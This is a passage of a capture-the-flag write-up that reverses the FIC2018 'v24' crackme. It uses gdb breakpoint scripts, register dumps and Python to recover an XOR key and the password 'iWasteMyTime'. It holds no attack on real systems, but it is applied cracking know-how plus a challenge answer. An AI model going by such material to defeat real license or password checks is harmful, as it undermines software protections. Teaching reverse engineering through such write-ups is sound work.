   0x0000000000400d21 <+131>: mov    %dl,0x601440(%rcx)
   0x0000000000400d27 <+137>: retq   
End of assembler dump.
(gdb)

Easy, disable breakpoint 1, and create two more:

(gdb) disable 1
(gdb) b * 0x0000000000400ce9
Breakpoint 2 at 0x400ce9
(gdb) commands
Type commands for breakpoint(s) 2, one per line.
End with a line saying just "end".
>echo first XOR in vm_xor\n
>info reg al
>x/x 0x601440+$rdx
>c
>end
(gdb) b * 0x0000000000400d1b
Breakpoint 3 at 0x400d1b
(gdb) commands
Type commands for breakpoint(s) 3, one per line.
End with a line saying just "end".
>echo second XOR in vm_func\n
>x/x 0x601440+$rax
>info reg dl
>c
>end
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :ABCDEF123456

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x60158e <g_data+334>: 0x13
dl             0x41 65                    //seems to be our input ('A')

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x601599 <g_data+345>: 0x37
dl             0x42 66                    //Yup it is

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015a4 <g_data+356>: 0xd3                  //So this one is the xor key
dl             0x43 67

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015af <g_data+367>: 0x3d
dl             0x44 68

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015ba <g_data+378>: 0xc0
dl             0x45 69

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015c5 <g_data+389>: 0xde
dl             0x46 70

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015d0 <g_data+400>: 0xab
dl             0x31 49

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015db <g_data+411>: 0xad
dl             0x32 50

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015e6 <g_data+422>: 0x1d
dl             0x33 51

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015f1 <g_data+433>: 0xea
dl             0x34 52

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x6015fc <g_data+444>: 0x13
dl             0x35 53

Breakpoint 3, 0x0000000000400d1b in vm_xor ()
second XOR in vm_func
0x601607 <g_data+455>: 0x37
dl             0x36 54
FAILEDn[Inferior 1 (process 4575) exited normally]
(gdb)

Well, only the second XOR is used, but it's not really important at this point. The important point is to see that each byte of our PASS has been XORed with a byte of a constant string (you can repeat the run to verify this).
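To make the two branches of vm_xor easier to follow, here is a Python model of the function. It is my reading of the disassembly above and not the original source: mem stands for g_data, regs for the array at 0x602900, and the function returns the new instruction pointer instead of writing it to regs+20.

```python
G_DATA = 0x601440  # base address of g_data in the binary

def vm_xor(mem, regs, ip):
    """Model of vm_xor. mem is a bytearray, regs a list of ints."""
    mode = mem[ip + 1]
    if mode == 0xAB:                       # first XOR: register with register
        dst = regs[mem[ip + 2]]            # offset in g_data to modify
        src = regs[mem[ip + 3]]            # value comes from a register
        mem[dst] ^= src & 0xFF
        return ip + 3
    if mode == 0xBB:                       # second XOR: register with immediate
        dst = regs[mem[ip + 2]]            # offset in g_data to modify
        mem[dst] ^= mem[ip + 3]            # key byte is stored in the code itself
        return ip + 3
    return ip + 1                          # unknown mode: only skip the opcode

# Replay the first call seen above: regs[0] = 0xf2, ip = 0x14b, PASS starts with 'A'
mem = bytearray(0x200)
mem[0xF2] = ord("A")
mem[0x14B:0x14F] = bytes.fromhex("ddbb0013")
regs = [0xF2, 0, 0, 0, 0, 0x14B, 0, 0]

new_ip = vm_xor(mem, regs, regs[5])
print(hex(new_ip), hex(mem[0xF2]), hex(G_DATA + regs[5] + 3))
```

The last value printed is 0x60158e, the address gdb displayed for the first key byte: the operand sits three bytes after the opcode. The model also returns ip + 3, so the pointer is left on the last operand byte and the main loop adds the final increment.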

So, we have an XOR key, if we copy it we have: 1337d33dc0deabad1dea1337

(1337d33dc0de?? 1337d34dc0de would have sounded better, I think. Another bug? ^_^ )

Now we have to find the expected solution: since PASS ^ key = solution, simple math gives PASS = key ^ solution.

3/ CMP part

Well, we use the same technique. Let's break on vm_cmp and see what happens in the registers:

(gdb) disable 2
(gdb) disable 3
(gdb) b * vm_cmp 
Breakpoint 4 at 0x400852
(gdb) commands 
Type commands for breakpoint(s) 4, one per line.
End with a line saying just "end".
>x/8wx &regs
>c
>end
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :123456ABCDEF

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000022 0x0000007a 0x00000005 0x00000060
0x602910 <regs+16>: 0x00000000 0x000001eb 0x00603010 0x00000000
FAILEDn[Inferior 1 (process 4746) exited normally]
(gdb) 
(gdb) r
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :ABCDEF123456

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000052 0x0000007a 0x00000075 0x00000060
0x602910 <regs+16>: 0x00000000 0x000001eb 0x00603010 0x00000000
FAILEDn[Inferior 1 (process 4751) exited normally]
(gdb)

Interesting. We see that register 1 changes, and register 2 stays the same.
One more check, because the key is 1337d33dc0deabad1dea1337:

'1' XOR '0x13' => 0x22
'A' XOR '0x13' => 0x52

So, we know that register 1 is PASS XOR key and register 2 is solution.

But, have you spotted something else really weird?

Register 3 changes too!!
And it doesn't take long to understand that register 3 also holds "PASS XOR key", this time for the second byte:

'2' XOR '0x37' => 0x05
'B' XOR '0x37' => 0x75
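These four checks are easy to replay in Python. The sketch below recomputes what registers 1 and 3 should contain at the first vm_cmp hit for both test inputs, using the key found in the XOR part; vm_regs is a made-up helper name.

```python
KEY = bytes.fromhex("1337d33dc0deabad1dea1337")

def vm_regs(password):
    """Return (register 1, register 3) expected at the first vm_cmp hit."""
    data = password.encode()
    return data[0] ^ KEY[0], data[1] ^ KEY[1]

for pw in ("123456ABCDEF", "ABCDEF123456"):
    print(pw, [hex(v) for v in vm_regs(pw)])
```

The values match the two register dumps above: 0x22 and 0x05 for the first input, 0x52 and 0x75 for the second.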

We know how to extract all bytes of the solution.
Once again, we use gdb breakpoint commands to force the registers to hold the expected values, and print them along the way.

(gdb) commands
Type commands for breakpoint(s) 4, one per line.
End with a line saying just "end".
>x/8wx &regs
>set *(char *) 0x602900 = *0x602904
>set *(char *) 0x602908 = *0x60290c
>c
>end
(gdb) r 
Starting program: /home/mitsurugi/chall/FIC2018/v24/a.out 
ENTER PASS :123456123456

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000022 0x0000007a 0x00000005 0x00000060
0x602910 <regs+16>: 0x00000000 0x000001eb 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x0000007a 0x0000007a 0x00000060 0x00000060
0x602910 <regs+16>: 0x00000000 0x000001f5 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x000000e0 0x000000b2 0x00000009 0x0000004e
0x602910 <regs+16>: 0x00000000 0x0000021b 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x000000b2 0x000000b2 0x0000004e 0x0000004e
0x602910 <regs+16>: 0x00000000 0x00000225 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x000000f5 0x000000b4 0x000000e8 0x000000bb
0x602910 <regs+16>: 0x00000000 0x00000255 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x0000009a 0x000000e6 0x0000009f 0x000000d4
0x602910 <regs+16>: 0x00000000 0x0000027b 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x000000e6 0x000000e6 0x000000d4 0x000000d4
0x602910 <regs+16>: 0x00000000 0x00000285 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x0000002e 0x00000049 0x000000de 0x00000083
0x602910 <regs+16>: 0x00000000 0x000002ab 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000049 0x00000049 0x00000083 0x00000083
0x602910 <regs+16>: 0x00000000 0x000002b5 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x00000026 0x0000007e 0x00000001 0x00000052
0x602910 <regs+16>: 0x00000000 0x000002db 0x00603010 0x00000000

Breakpoint 4, 0x0000000000400852 in vm_cmp ()
0x602900 <regs>: 0x0000007e 0x0000007e 0x00000052 0x00000052
0x602910 <regs+16>: 0x00000000 0x000002e5 0x00603010 0x00000000
WINn[Inferior 1 (process 5104) exited with code 0377]
(gdb)

Ok, job done, we just have to copy the bytes from registers 2 and 4. vm_cmp has two pairs of bytes to compare, but the function is called twice. I really should dig inside this function to understand how it works :)

solution is: 7a60b24eb4bbe6d449837e52
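Copying the bytes by hand works, but it can also be scripted. The sketch below takes the first four registers from each vm_cmp hit of the last run and keeps registers 2 and 4, dropping the repeated hit of each pair. The values are copied from the transcript above; solution_from_hits is a made-up name, and the de-duplication would be wrong if two consecutive solution pairs happened to be identical.

```python
# (register 1, register 2, register 3, register 4) at each vm_cmp hit
hits = [
    (0x22, 0x7a, 0x05, 0x60), (0x7a, 0x7a, 0x60, 0x60),
    (0xe0, 0xb2, 0x09, 0x4e), (0xb2, 0xb2, 0x4e, 0x4e),
    (0xf5, 0xb4, 0xe8, 0xbb),
    (0x9a, 0xe6, 0x9f, 0xd4), (0xe6, 0xe6, 0xd4, 0xd4),
    (0x2e, 0x49, 0xde, 0x83), (0x49, 0x49, 0x83, 0x83),
    (0x26, 0x7e, 0x01, 0x52), (0x7e, 0x7e, 0x52, 0x52),
]

def solution_from_hits(hits):
    """Keep registers 2 and 4 of each hit, skipping consecutive repeats."""
    pairs = []
    for _, r2, _, r4 in hits:
        if not pairs or pairs[-1] != (r2, r4):
            pairs.append((r2, r4))
    return bytes(b for pair in pairs for b in pair)

print(solution_from_hits(hits).hex())
```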

4/ Victory

#! /usr/bin/python
# First you have to be hit to know how to defend.
#                                     0xMitsurugi

key='1337d33dc0deabad1dea1337'.decode('hex')
sol='7a60b24eb4bbe6d449837e52'.decode('hex')

# PASS = key ^ solution, byte by byte
flag=[]
for i in range(len(sol)):
    c=chr(ord(sol[i]) ^ ord(key[i]))
    flag.append(c)

print ''.join(flag)

And without any surprise:

mitsurugi@dojo:~/chall/FIC2018/v24$ ./crack.py 
iWasteMyTime
mitsurugi@dojo:~/chall/FIC2018/v24$

Job done, time to drink beer for victory.

I have not failed 700 times, I have not failed once.

I have succeeded in proving those 700 ways will not work.

When I have eliminated the ways that will not work,

I will find the way that will work

0xMitsurugi